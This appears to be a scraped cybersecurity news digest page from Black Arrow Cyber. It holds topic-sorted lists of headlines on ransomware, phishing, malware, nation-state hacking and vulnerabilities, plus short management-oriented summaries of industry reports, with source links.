VPN Vulnerabilities Drive Nearly 30% Of Q3 Ransomware Attacks

CISA says BianLian ransomware now focuses only on data theft

The case for a ransomware payment ban - Tech Monitor

Growth in phishing, changes in ransomware crews mark threat landscape | SC Media

Fresh warning issued over encryption-less ransomware as notorious threat group shifts tactics | ITPro

Pro-Russian Hacktivists Launch Branded Ransomware Operations - Infosecurity Magazine

Ransomware payments are now a critical business decision - Help Net Security

Ransomware Groups Targeting VPNs for Initial Access: Report | MSSP Alert

BlackBasta Ransomware Brand Picks Up Where Conti Left Off

CyberVolk analysis explores ransomware, hacktivism interconnections | SC Media

Mimic Ransomware: What You Need To Know | Tripwire

Zyxel firewalls targeted in recent ransomware attacks

Victims Must Disclose Ransom Payments Under Australian Law

Ransomware Victims

Microlise Confirms Data Breach as Ransomware Group Steps Forward - SecurityWeek

Blue Yonder ransomware attack disrupts supply chains across UK and US

Wake Up And Smell The Ransomware—Starbucks Impacted By Cyber Attack

Supply chain vendor Blue Yonder succumbs to ransomware • The Register

'Real threat' still posed by hackers says council subject to devastating cyber attack four years ago - Teesside Live

NHS declares major cyber incident for third time this year • The Register

Further disruption expected after latest NHS cyber attack | Computer Weekly

Phishing & Email Based Attacks

Business Email Compromise Scams: What They Are, and How to Avoid Them | Ogletree, Deakins, Nash, Smoak & Stewart, P.C. - JDSupra

Phishing Attacks Dominate Threat Landscape In Q3 2024

Email Phishing and DMARC Statistics - Security Boulevard

Growth in phishing, changes in ransomware crews mark threat landscape | SC Media

Hackers Update Tactics to Bypass Multifactor Authentication - Petri IT Knowledgebase

Rise in phishing attacks observed from August to October 2024

Flying Under the Radar - Security Evasion Techniques

Phishing attacks via ‘URL rewriting’ to evade detection escalate | SC Media

Scammers use you're fired lures in phishing campaign • The Register

“Sad announcement” email implies your friend has died | Malwarebytes

OpenSea NFT Phishers Aim to Drain Crypto Wallets

Email Is Insecure: 4 Reasons I Avoid It Like the Plague

Three-Quarters of Black Friday Spam Emails Identified as Scams - Infosecurity Magazine

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Business Email Compromise Scams: What They Are, and How to Avoid Them | Ogletree, Deakins, Nash, Smoak & Stewart, P.C. - JDSupra

Other Social Engineering

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

How to recognize employment fraud before it becomes a security issue - Help Net Security

Meta Finally Breaks Its Silence on Pig Butchering | WIRED

Bangkok busts SMS Blaster sending 1 million scam texts from a van

North Korea Deploying Fake IT Workers in China, Russia, Other Countries - SecurityWeek

Artificial Intelligence

Cloned customer voice beats bank security checks - BBC News

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

Over a Third of Firms Struggling With Shadow AI - Infosecurity Magazine

AI in cyber security: Not yet autonomous, but the time to prepare is now

British spies to ramp up fight against Russian cyber threats with launch of cutting-edge... - LBC

Russia plotting to use AI to enhance cyber-attacks against UK, minister will warn | Russia | The Guardian

Britain, NATO must stay ahead in 'new AI arms race', says UK minister | Reuters

Faux ChatGPT, Claude API Packages Deliver JarkaStealer

AI is the latest tool in the cyber security cat-and-mouse game - Fast Company

AI Used for Good and Bad — Like Making Trickier Malware, Says Report

Teaching AI to Hack: Researchers Demonstrate ChatGPT's to Ethically Hack Linux & Windows

Deepfakes of Elon Musk are contributing to billions of dollars in fraud losses in the U.S. - CBS News

Organisations unprepared for the AI onslaught must do these 4 things | ZDNET

'Tis the season for website cloning tools, RCEs and AI phishing lures | SC Media

2FA/MFA

‘Adversary in the middle attacks’ are becoming hackers’ go-to method to bypass MFA | ITPro

Hackers Update Tactics to Bypass Multifactor Authentication - Petri IT Knowledgebase

Malware

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

2024 saw a surge in malicious free VPN apps | TechRadar

Russian Hackers Deploy HATVIBE and CHERRYSPY Malware Across Europe and Asia

Novel WolfsBane backdoor leveraged in Chinese attacks against Linux systems | SC Media

Salt Typhoon hackers backdoor telcos with new GhostSpider malware

What cyber attacks are bots commonly associated with?

Aggressive Chinese APT Group Targets Governments with New Backdoors - Infosecurity Magazine

Chinese Hackers Use GHOSTSPIDER Malware to Hack Telecoms Across 12+ Countries

Skimmer Malware Targets Magento Sites Ahead of Black Friday

APT-K-47 Uses Hajj-Themed Lures to Deliver Advanced Asyncshell Malware

Hackers abuse Avast anti-rootkit driver to disable defences

Researchers Uncover Malware Using BYOVD to Bypass Antivirus Protections

IoT Device Traffic Up 18% as Malware Attacks Surge 400% - Infosecurity Magazine

The source code of Banshee Stealer leaked online

Faux ChatGPT, Claude API Packages Deliver JarkaStealer

How Facebook and Instagram Malware Works (and How to Spot It Before You Click)

Researchers Discover "Bootkitty" – First UEFI Bootkit Targeting Linux Kernels

AI Used for Good and Bad — Like Making Trickier Malware, Says Report

APT-C-60 Hackers Exploit StatCounter and Bitbucket in SpyGlace Malware Campaign

Gaming Engines: An Undetected Playground for Malware Loaders - Check Point Research

Bots/Botnets

What cyber attacks are bots commonly associated with?

Growing Matrix Botnet Poses Escalating Global Threat

Mobile

Why you should power off your phone once a week - according to the NSA | ZDNET

One Down, Many to Go with Pre-Installed Malware on Android | Electronic Frontier Foundation

Denial of Service/DoS/DDoS

Here’s how simple it is for script kiddies to stand up DDoS services | CyberScoop

Is Your Router In The Matrix—35 Million Devices Under Blue Pill Attack

Internet of Things – IoT

My Car Knows My Secrets, and I'm (Mostly) OK With That

Growing Matrix Botnet Poses Escalating Global Threat

IoT Device Traffic Up 18% as Malware Attacks Surge 400% - Infosecurity Magazine

Data Breaches/Leaks

Prison layouts reportedly leaked on dark web in data breach - BBC News

Data leaks from websites built on Microsoft Power Pages, including 1.1 million NHS records

New York Fines Geico and Travelers $11 Million Over Data Breaches - SecurityWeek

A US soldier is suspected of being behind the massive Snowflake data leak | CSO Online

Data broker leaves 600K+ sensitive files exposed online • The Register

TfL cyber attack: Independent review will examine huge hack and response | The Standard

Military dating site leaves database with 1M records exposed | Biometric Update

HIA: Survivors awarded £30,000 after data breach - BBC News

Zello asks users to reset passwords after security incident

Hack Against Andrew Tate Continues With Leak Of Staff Chats

Hackers Breach Andrew Tate's Online 'University,' Exposing 800,000 Users

Organised Crime & Criminal Actors

The rise and fall of the 'Scattered Spider' hackers | TechCrunch

Major cyber crime crackdowns signal shift in global cyber security strategies

Interpol: Major cyber crime operation nets 1,006 suspects – DataBreaches.Net

Authorities disrupt major cyber crime operation, 1000+ suspects arrested - Help Net Security

US alleges man is cyber crook with distaste for opsec • The Register

DoJ seized credit card marketplace PopeyeTools

DOJ: Man hacked networks to pitch cyber security services

'Hacker' breaks into gym to get hired, gets arrested instead | PCWorld

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

North Korean hackers have stolen billions in crypto by posing as VCs, recruiters and IT workers | TechCrunch

Crypto Hacks Drop 15% Year-to-Date, over $70 Million Lost in November

Deepfakes of Elon Musk are contributing to billions of dollars in fraud losses in the U.S. - CBS News

OpenSea NFT Phishers Aim to Drain Crypto Wallets

Insider Risk and Insider Threats

83% of organisations reported insider attacks in 2024

Human Factors in Cyber Security in 2024 | UpGuard

Insurance

Cyber attacks cost British businesses $55 billion in past five years, broker says | Reuters

Howden urges insurers to tackle cyber cover penetration gap as 52% report attack in last five years | Insurance Times

Supply Chain and Third Parties

Rising cyber threat driven by Single Point of Failure risk

Blue Yonder ransomware attack disrupts supply chains across UK and US

Wake Up And Smell The Ransomware—Starbucks Impacted By Cyber Attack

Supply chain vendor Blue Yonder succumbs to ransomware • The Register

Outages

Microsoft CEO Nadella Calls for 'Culture Change' After Security Lapses - Business Insider

Rising cyber threat driven by Single Point of Failure risk

Microsoft 365 outage impacts Exchange Online, Teams, Sharepoint

Microsoft aims for better Windows security • The Register

CrowdStrike still doesn’t know cost of Falcon flame-out • The Register

Encryption

Albanian Drug Smugglers Busted After Cops Decrypt Comms - Infosecurity Magazine

Linux and Open Source

Novel WolfsBane backdoor leveraged in Chinese attacks against Linux systems | SC Media

Researchers Discover "Bootkitty" – First UEFI Bootkit Targeting Linux Kernels

Passwords, Credential Stuffing & Brute Force Attacks

Passwords are giving way to better security methods – until those are hacked too, that is | US small business | The Guardian

I Ran a Password Audit and Was Suprised How Many Outdated Passwords I Have

Zello asks users to reset passwords after security incident

Stop Using Your Passwords—1Password And Google Warn

Social Media

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

Meta Finally Breaks Its Silence on Pig Butchering | WIRED

Meta Shutters Two Million Scam Accounts in Pig Butchering Crackdown - Infosecurity Magazine

How Facebook and Instagram Malware Works (and How to Spot It Before You Click)

Regulations, Fines and Legislation

The EU Cyber Resilience Act: Implications for Companies | Hogan Lovells - JDSupra

New York Fines Geico and Travelers $11 Million Over Data Breaches - SecurityWeek

EC opens new infringement procedures against Bulgaria and 22 other EU countries over cyber security rules - Българска национална телевизия

EU: Cyber Resilience Act published in EU Official Journal | DLA Piper - JDSupra

HIA: Survivors awarded £30,000 after data breach - BBC News

US senators propose mandated MFA, encryption in healthcare • The Register

Opportunities for Regulatory Harmonization Under Trump's Deregulation Agenda

Telecoms Security Act Compliance... - Analysis - Mobile News

Cyber security bill passes parliament - Security - iTnews

Victims Must Disclose Ransom Payments Under Australian Law

Models, Frameworks and Standards

The EU Cyber Resilience Act: Implications for Companies | Hogan Lovells - JDSupra

EC opens new infringement procedures against Bulgaria and 22 other EU countries over cyber security rules - Българска национална телевизия

EU: Cyber Resilience Act published in EU Official Journal | DLA Piper - JDSupra

Why Cyber Security Leaders Trust the MITRE ATT&CK Evaluations

Careers, Working in Cyber and Information Security

Practical strategies to build an inclusive culture in cyber security - Help Net Security

8 Tips for Hiring Neurodivergent Talent

Why IT Leaders Should Hire Veterans for Cyber Security Roles

How cyber security certification can drive business growth - Digital Journal

The Next Hot Cyber Security Skill for Your Resume? Empathy

Law Enforcement Action and Take Downs

The rise and fall of the 'Scattered Spider' hackers | TechCrunch

Major cyber crime crackdowns signal shift in global cyber security strategies

Interpol: Major cyber crime operation nets 1,006 suspects – DataBreaches.Net

Authorities disrupt major cyber crime operation, 1000+ suspects arrested - Help Net Security

Bangkok busts SMS Blaster sending 1 million scam texts from a van

US alleges man is cyber crook with distaste for opsec • The Register

DoJ seized credit card marketplace PopeyeTools

Telco engineer spying on employer for Beijing gets 4 years • The Register

US Citizen Sentenced for Spying on Behalf of China's Intelligence Agency

Calls for a ‘more offensive’ police approach to cyber attacks and a stronger national tech strategy - Policing Insight

Albanian Drug Smugglers Busted After Cops Decrypt Comms - Infosecurity Magazine

DOJ: Man hacked networks to pitch cyber security services

'Hacker' breaks into gym to get hired, gets arrested instead | PCWorld

Police bust pirate streaming service making €250 million per month

Telco engineer spying on employer for Beijing gets 4 years • The Register

Misinformation, Disinformation and Propaganda

Google Deindexes Chinese Propaganda Network - Infosecurity Magazine

Google blocked 1000 pro China websites from services • The Register

'Operation Undercut' Adds to Russia Influence Campaigns

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Britain, NATO must stay ahead in 'new AI arms race', says UK minister | Reuters

“Cyber war is now a daily reality”, UK government minister says

UK calls for stronger NATO cyber defences

Wire cutters: how the world’s vital undersea data cables are being targeted | Telecoms | The Guardian

5th Generation War: A War Without Borders and its Impact on Global Security - Modern Diplomacy

Nation State Actors

China

The Cyberthreats from China are Ongoing: U.S. Officials - Security Boulevard

Chinese Hackers Use GHOSTSPIDER Malware to Hack Telecoms Across 12+ Countries

Chinese vessel 'sabotaged' Baltic deep sea cables and may have been under orders from Russia

Satellite Image Shows Chinese Ship Suspected of Sabotage in 'NATO Lake' - Newsweek

Salt Typhoon’s cyber storm reaches beyond US telcos • The Register

Chinese hackers preparing for conflict, says US cyber official | The Straits Times

Novel WolfsBane backdoor leveraged in Chinese attacks against Linux systems | SC Media

China's Cyber Offensives Helped by Private Firms, Academia

Accident or sabotage? American and European officials disagree as key undersea cables are cut | CNN

Google Deindexes Chinese Propaganda Network - Infosecurity Magazine

China's telco attacks mean 'thousands' of boxes compromised • The Register

Top senator calls Salt Typhoon “worst telecom hack in our nation’s history” - The Washington Post

CrowdStrike identifies new China hackers breaching telecom networks

NSA Director Wants Industry to Disclose Details of Telecom Hacks - Bloomberg

T-Mobile Engineers Spotted Hackers Running Commands on Routers - Bloomberg

Game of Emperor: Unveiling Long Term Earth Estries Cyber Intrusions | Trend Micro (US)

US must counter new Chinese cyber attacks. Remember how it lost nuclear monopoly?

China Conceling State, Corporate & Academic Assets For Offensive Attacks

China’s Surveillance State Is Selling Citizen Data as a Side Hustle | WIRED

Aggressive Chinese APT Group Targets Governments with New Backdoors - Infosecurity Magazine

Google blocked 1000 pro China websites from services • The Register

Telco engineer spying on employer for Beijing gets 4 years • The Register

US Citizen Sentenced for Spying on Behalf of China's Intelligence Agency

Telco engineer spying on employer for Beijing gets 4 years • The Register

Imagine a land where algorithms don't ruin the Internet • The Register

Russia

Russia ‘aggressive’ and ‘reckless’ in cyber realm and threat to Nato, UK minister to warn | UK news | The Guardian

Britain should prepare for 'aggressive and reckless' Russian cyber attacks, minister warns

UK warns of imminent Russian cyber attacks targeting NATO amid Ukraine war | World News - Hindustan Times

Chinese vessel 'sabotaged' Baltic deep sea cables and may have been under orders from Russia

Russian Cyberespionage Group Hit 60 Victims in Asia, Europe - SecurityWeek

Russian Spies Jumped From One Network to Another Via Wi-Fi in an Unprecedented Hack | WIRED

Nato countries are in a ‘hidden cyber war’ with Russia, says Liz Kendall | The Standard

Britain, NATO must stay ahead in 'new AI arms race', says UK minister | Reuters

Nato countries in 'hidden cyber war' with Russia, minister warns | ITV News

Russian hybrid attacks may lead to NATO invoking Article 5, says German intel chief | Reuters

UK closely monitoring Russian spy ship as it passes near British Isles — 'undersea cables are a shared concern' says Ministry of Defence | Tom's Hardware

Accident or sabotage? American and European officials disagree as key undersea cables are cut | CNN

RomCom Exploits Zero-Day Firefox and Windows Flaws in Sophisticated Cyber Attacks

Firefox and Windows zero-days exploited by Russian RomCom hackers

Is Your Router In The Matrix—35 Million Devices Under Blue Pill Attack

Russia-linked APT TAG-110 uses targets Europe and Asia - Security Affairs

'Operation Undercut' Adds to Russia Influence Campaigns

CyberVolk analysis explores ransomware, hacktivism interconnections | SC Media

CISA says BianLian ransomware now focuses only on data theft

Here’s how simple it is for script kiddies to stand up DDoS services | CyberScoop

Pro-Russian Hacktivists Launch Branded Ransomware Operations - Infosecurity Magazine

North Korea

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

North Korea Deploying Fake IT Workers in China, Russia, Other Countries - SecurityWeek

North Korean hackers have stolen billions in crypto by posing as VCs, recruiters and IT workers | TechCrunch

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

APT-C-60 Hackers Exploit StatCounter and Bitbucket in SpyGlace Malware Campaign

Man warns 'this is just the beginning' after cyber attack on Merseyside Police - Liverpool Echo

Tools and Controls

VPN Vulnerabilities Drive Nearly 30% Of Q3 Ransomware Attacks

2024 saw a surge in malicious free VPN apps | TechRadar

How to recognize employment fraud before it becomes a security issue - Help Net Security

AI in cyber security: Not yet autonomous, but the time to prepare is now

Incident response diplomacy: UK to launch new capability to help attacked allies | The Record from Recorded Future News

Email Phishing and DMARC Statistics - Security Boulevard

Ransomware Groups Targeting VPNs for Initial Access: Report | MSSP Alert

Microsoft Teams monitoring tips for admins | TechTarget

Cyber security’s oversimplification problem: Seeing AI as a replacement for human agency | CSO Online

What is compliance risk? | Definition from TechTarget

Is Cyber Threat Intelligence Worthless? - Security Boulevard

Machine Learning in Cyber Security: Harnessing the Power of Five AI Tribes - Security Boulevard

CIOs warned of AI over-reliance in cyber security defence

AI Used for Good and Bad — Like Making Trickier Malware, Says Report

Modern workplaces increasingly resemble surveillance zones • The Register

The role of data recovery in cyber resilience

AI is the latest tool in the cyber security cat-and-mouse game - Fast Company

Businesses prioritize cyber security in digital transformation: GSMAi

Data Security Best Practices: 7 Tips to Crush Bad Actors | MSSP Alert

Cloudflare says it lost 55% of logs pushed to customers for 3.5 hours

DOJ: Man hacked networks to pitch cyber security services

'Hacker' breaks into gym to get hired, gets arrested instead | PCWorld

The ‘Great IT Rebrand’: Restructuring IT for business success | CIO

Other News

Your beloved old tech is a security risk. It's time to let go | PCWorld

Latest Multi-Stage Attack Scenarios with Real-World Examples

Avoiding cyber complacency as a small business

Will 2025 be the turning point for cyber security in finance? - FinTech Futures: Fintech news

Microsoft CEO Nadella Calls for 'Culture Change' After Security Lapses - Business Insider

Microsoft aims for better Windows security • The Register

The threats of USB-based attacks for critical infrastructure | TechRadar

The industries impacted most by cyber crime in 2024

Cyber Attacks On Healthcare: A Global Threat That Can’t Be Ignored | Scoop News

Six future-proofing strategies family offices need to stay ahead

The rise in public sector cyber attacks and what can be done | London City Hall

TfL cyber attack: Independent review will examine huge hack and response | The Standard

Craigslist founder on his $100M pledge to fight cyber attacks on US

DOJ Will Reportedly Force Google to Sell Off Chrome Browser

10 Of The Worst Cyber Security Mistakes You're Probably Making Right Now

Protect your charity from cyber crime - GOV.UK

Forensic audit of the US election is needed to protect democracy

Vulnerability Management

VPN Vulnerabilities Drive Nearly 30% Of Q3 Ransomware Attacks

400,000 Systems Potentially Exposed to 2023's Most Exploited Flaws - SecurityWeek

Google’s AI-powered fuzzing tool discovers 26 new vulnerabilities | SC Media

How should software producers be held accountable for shoddy cyber security products?

The effect of compliance requirements on vulnerability management strategies - Help Net Security

Vulnerabilities

Researchers reveal exploitable flaws in corporate VPN clients - Help Net Security

Critical 7-Zip Vulnerability Let Attackers Execute Arbitrary Code

Firefox and Windows zero-days exploited by Russian RomCom hackers

Hackers abuse Avast anti-rootkit driver to disable defences

Microsoft Patches Exploited Vulnerability in Partner Network Website - SecurityWeek

WordPress Plugin Flaw Exposes 200,000 WordPress Sites To Hacking

VMware Patches High-Severity Vulnerabilities in Aria Operations - SecurityWeek

Hackers exploit critical bug in Array Networks SSL VPN products

Researchers Uncover Malware Using BYOVD to Bypass Antivirus Protections

Zyxel firewalls targeted in recent ransomware attacks

Malicious Actors Exploit ProjectSend Critical Vulnerability - Infosecurity Magazine

Critical QNAP Vulnerability Let Attackers Execute Remote Code

IBM Patches RCE Vulnerabilities in Data Virtualization Manager, Security SOAR - SecurityWeek

Weekend QNAP, Veritas bugs hit patch pipelines • The Register

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Cyber Security Dominates Concerns Among the C-Suite, Small Businesses and the Nation

Cyber security is now the top concern for organisations globally, with the 2024 Allianz Risk Barometer naming cyber events as the number one business risk. Gartner forecasts a 15% increase in information security spending by 2025, reaching $212 billion. Small businesses are also vulnerable, with 60% ranking cyber security risks as major concerns. Generative AI introduces new threats, and Gartner predicts that by 2027, 17% of cyber attacks and data leaks will involve generative AI.

Cyber Criminals Don’t Take Holidays Warns Expert

Semperis has found that cyber attacks during holidays and weekends pose a significant risk to businesses because many are underprepared to handle incidents outside of standard working hours. These risks intensify when an organisation’s security capability is reduced on holidays and weekends. The report highlighted that identity-related attacks are a major concern, yet a quarter of respondents feel they lack the expertise to protect against them, and over 22% don't have an identity recovery plan in place.

The Urgent and Critical Need to Prioritise Mobile Security

Recent findings reveal that mobile security threats are a top concern for organisations. With over 55% of organisations increasing their mobile device users and more than 70% of employees using smartphones for work tasks, threats like mobile phishing and malware are intensifying. The report indicates that 82% of phishing websites are designed for mobile users, and 200 malicious apps on Google Play have been downloaded 8 million times. Despite this, many organisations face challenges in mitigating mobile risks due to device diversity and user control, highlighting a critical need for improved mobile security measures.

Companies Take Over Seven Months to Recover from Cyber Incidents

A new report reveals that organisations are underestimating recovery times from cyber incidents, with actual recovery averaging over seven months, 25% longer than anticipated. This gap widens to nearly 11 months for companies reducing cyber security investments. Despite efforts like implementing stronger security measures (43%) and offering additional employee training (41%), nearly half of organisations are rethinking how they use existing cyber security tools. The study also highlights a shift towards shared responsibility, with platform engineering teams and app developers increasingly held accountable alongside traditional roles like Chief Information Security Officers (CISOs) and CIOs.

Data is the New Uranium – Incredibly Powerful and Amazingly Dangerous

Recent insights from Chief Information Security Officers (CISOs) indicate that data-related risks are becoming a primary concern for organisations. The vast and dispersed nature of data storage has led many CISOs to feel that the cost of managing data now outweighs its value. There’s a growing perception that the business proposition of ‘big data’ is shifting from a net positive to a net negative. This underscores the urgent need for organisations to manage data carefully and to be fully aware of the risks and costs associated with potential breaches.

‘Scam Yourself’ Attacks Just Increased Over 600% - Here’s What to Look For

Gen, the company behind Norton and Avast, reports a 614% surge in ‘scam yourself’ cyber attacks in the third quarter compared to the second. These scams leverage social engineering to trick users into downloading malware themselves. Notably, over two million people worldwide were targeted by fake captcha scams in the past quarter. Despite increased vigilance, users remain vulnerable to fake updates, deceptive fixes, and counterfeit tutorials that often instruct them to disable antivirus software or input commands that compromise security.

60% of Emails with QR Codes Classified as Spam or Malicious

Cisco Talos has found that 60% of emails containing QR codes are classified as spam, with some being malicious and targeting users with phishing or credential theft. Despite representing only about one in 500 global emails, these QR code emails effectively bypass security filters. Attackers use deceptive methods like blending QR codes into attractive designs. The report emphasises the importance of ‘defanging’ QR codes to neutralise threats, and advises treating QR codes with the same caution as unknown URLs. Users should be vigilant when scanning QR codes and avoid entering credentials into unknown sites linked via QR codes.

Coalition Highlights 68% Surge in Ransomware Claims Severity, as Active Ransomware Groups Increase 56%

Coalition's latest report reveals a 68% surge in the severity of ransomware claims, with average losses escalating to $353,000. Searchlight Cyber has found a 56% increase in active ransomware groups in the first half of 2024, tracking 73 groups compared to 46 last year. This rise indicates that the fight against ransomware is far from over. The impact of ransomware has intensified, particularly affecting larger companies. Coalition also notes a rise in significant cyber risk aggregation events (which cause widespread loss to other organisations) disrupting a substantial proportion of healthcare firms and auto dealerships with revenues over $100 million. Business email compromise remains the most common cyber incident, increasing by 4% and constituting nearly one-third of all cyber insurance claims. Meanwhile, claims severity overall rose by 14%.

One Deepfake Digital Identity Attack Strikes Every Five Minutes

Entrust has reported that deepfake attacks are occurring every five minutes in 2024, posing a significant threat to digital identity verification systems. The report found that deepfakes account for 24% of fraudulent attempts to bypass motion-based biometric checks used by banks and service providers. In contrast, only 5% of these attacks target basic selfie-based authentication methods. The growing accessibility of generative AI technology is enabling fraudsters to circumvent advanced security measures. Entrust highlighted that organisations must proactively adapt their security strategies, as these evolving threats are pervasive across all sectors.

Supply Chain Attacks Up Over 400% Since 2021

Cowbell Insurance has found that supply chain attacks have surged by 431% since 2021. Large enterprises with over $50 million in revenue are 2.5 times more likely to face cyber incidents. Manufacturing is the most vulnerable sector due to its reliance on automation and exposure to intellectual property threats. Public administration and educational services also face elevated risks, with a 70% increase in attacks on educational institutions over the past year. The report identifies five risky technology categories: operating systems, content management tools, virtualisation technologies, server-side technologies, and business applications. No business is immune to cyber threats and the consequences can be devastating.

Rethinking Cyber Security from Cost Centre to Value Driver

A University of Maryland study found that cyber attacks occur every 39 seconds, amounting to 2,244 attacks daily. Cybersecurity Ventures predicts annual cyber damages will reach $10.5 trillion by 2025. Despite these alarming figures, many organisations treat cyber security as a minimal compliance exercise. Leadership must transform this approach by integrating cyber security into business strategy, fostering a culture of trust and resilience. By prioritising employee training and leveraging technologies like artificial intelligence, companies can enhance customer loyalty, avoid regulatory issues, and shift cyber security from a cost centre to a value driver.

Majority of UK Businesses Lack Readiness for Rising AI-Led Phishing Attacks, Reveals Survey

Vodafone Business has found that most UK businesses are unprepared for the rapid rise in AI-led phishing attacks, which have increased 60% globally over the past year. Despite over three quarters of business leaders expressing confidence in employees' ability to detect scams, only a third could identify fraudulent communications. The report highlighted that over half of UK businesses lack a response plan for AI-driven phishing, and younger employees are particularly susceptible, with nearly half aged 18 to 24 not updating passwords in over a year.

Sources:

https://securityintelligence.com/articles/cybersecurity-dominates-concerns-c-suite-small-businesses-nation/

https://www.emergingrisks.co.uk/cyber-criminals-dont-take-holidays-warns-expert/

https://www.securityweek.com/the-urgent-and-critical-need-to-prioritize-mobile-security/

https://www.infosecurity-magazine.com/news/companies-seven-months-recover/

https://www.theregister.com/2024/11/20/data_is_the_new_uranium/

https://www.zdnet.com/article/scam-yourself-attacks-just-increased-over-600-heres-what-to-look-for/

https://www.infosecurity-magazine.com/news/60-emails-qr-codes-spam-malicious/

https://www.reinsurancene.ws/coalition-highlights-68-surge-in-ransomware-claims-severity/

https://securityintelligence.com/news/research-finds-56-percent-increase-active-ransomware-groups/

https://www.infosecurity-magazine.com/news/deepfake-identity-attack-every/

https://betanews.com/2024/11/21/supply-chain-attacks-up-over-400-percent-since-2021/

https://www.forbes.com/councils/forbesfinancecouncil/2024/11/18/rethinking-cybersecurity-from-cost-center-to-value-driver/

https://www.techmonitor.ai/technology/cybersecurity/majority-of-uk-businesses-lack-readiness-for-rising-ai-led-phishing-attacks-finds-survey

Governance, Risk and Compliance

Cyber security dominates concerns among the C-suite, small businesses and the nation

Rethinking Cyber Security From Cost Center To Value Driver

Cyber Threats, Changes in Climate, and Business Interruption are Insurance Buyers’ and Sellers’ Top Risk Concerns, Says New Munich Re/Triple-I Survey | Business Wire

So, you don’t have a chief information security officer? 9 signs your company needs one | CSO Online

Cyber criminals don’t take holidays warns expert

Chris Inglis: Why cyber security success hinges on strategic choices, not just tech | SC Media

Data is the new uranium – both powerful and dangerous • The Register

FINMA Risk Monitor 2024: Principal risks for the financial sector and uncertainties due to geopolitical tensions | FINMA

Cyber Security is Everyone’s Responsibility - Security Boulevard

Overcoming the cyber paradox: Shrinking budgets – growing threats | Computer Weekly

Hackers Aren’t Cutting Back, Why is Your Security Budget?

Applying the Enterprise Risk Mindset to Navigate Cyber Security Threats - New Risk Mindset Series | Mayer Brown - JDSupra

Full recovery from breaches takes longer than expected - Help Net Security

Google report shows CISOs must embrace change to stay secure - Help Net Security

Soaring cyber risks: Large enterprises, supply chains and key industries in the crosshairs

Emerging Security Practices in Digital Finance: By Shiv Nanda

Poor cyber hygiene enabled nearly 30% of cyber attacks last quarter | StateScoop

Insights from Cohesity on cyber resilience as a technical team sport - SiliconANGLE

Interconnectivity and cyber risk: A double-edged sword - IT Security Guru

We Can Do Better Than Free Credit Monitoring After a Breach

Breaches Don't Have to Be Disasters

CISOs can now obtain professional liability insurance | CyberScoop

Experts warn businesses of escalating cyber security threats

CISOs Look to Establish Additional Leadership Roles - Security Boulevard

Threats

Ransomware, Extortion and Destructive Attacks

Armis: Triple Extortion Attacks Becoming More Common | SC Media UK

Research finds 56% increase in active ransomware groups

Ransomware gang Akira leaks unprecedented number of victims’ data in one day

Ransomware is doubling down—What you need to know about the recent surge - Security Boulevard

Akira Ransomware Racks Up 30+ Victims in a Single Day

Cloud ransomware threats rise, targeting S3 & Azure

FBI says BianLian based in Russia, moving from ransomware attacks to extortion

Ransomware Evolution: From Triple-Quadruple Extortion to RaaS - Security Boulevard

Coalition highlights 68% surge in ransomware claims severity - Reinsurance News

Ransomware Groups Use Cloud Services For Data Exfiltration - Infosecurity Magazine

Hibernation is Over? Akira Ransomware: Published Over 30 New Victims on their DLS – DataBreaches.Net

Ransomware attacks primarily caused by poor cyber hygiene | SC Media

Cyber insurers address ransom reimbursement policy concerns | TechTarget

Ransomware Gangs on Recruitment Drive for Pen Testers - Infosecurity Magazine

Trellix report reveals evolving ransomware ecosystem trends

Security Bite: Ransomware groups surge in Q3 2024, with shifting dominance - 9to5Mac

Ransomware Attacks On Healthcare Sector Surge In 2024

Linux Variant of Helldown Ransomware Targets VMware

Helldown ransomware exploits Zyxel VPN flaw to breach networks

Alleged Russian Phobos ransomware administrator extradited to U.S., in custody | CyberScoop

Threat Landscape: Corporate Japan Its Own Worst Enemy in the Ransomware War | Nippon.com

Ransomware Victims

How the British Library hack has caused havoc for UK research

SafePay ransomware gang claims attack on UK's Microlise • The Register

Ransomware Attack on Oklahoma Medical Center Impacts 133,000 - SecurityWeek

Aspen Healthcare Services Announces Data Breach Following Ransomware Attack | Console and Associates, P.C. - JDSupra

Change Healthcare’s clearing house restored after 9 months • The Register

Cyber attack dents Arnold Clark’s profits but group will face ‘no further action’ – Car Dealer Magazine

Phishing & Email Based Attacks

Phishing emails increasingly use SVG attachments to evade detection

Communication platforms play a major role in data breach risks

You're Not Imagining It: Phishing Attacks Are Rampant

Why email security is still so bad today - 9to5Mac

Why AI alone can't protect you from sophisticated email threats - Help Net Security

Phishing Decoded: How Cyber Criminals Target You And How To Fight Back

Majority of UK businesses lack readiness for rising AI-led phishing attacks, reveals survey

60% of Emails with QR Codes Classified as Spam or Malicious - Infosecurity Magazine

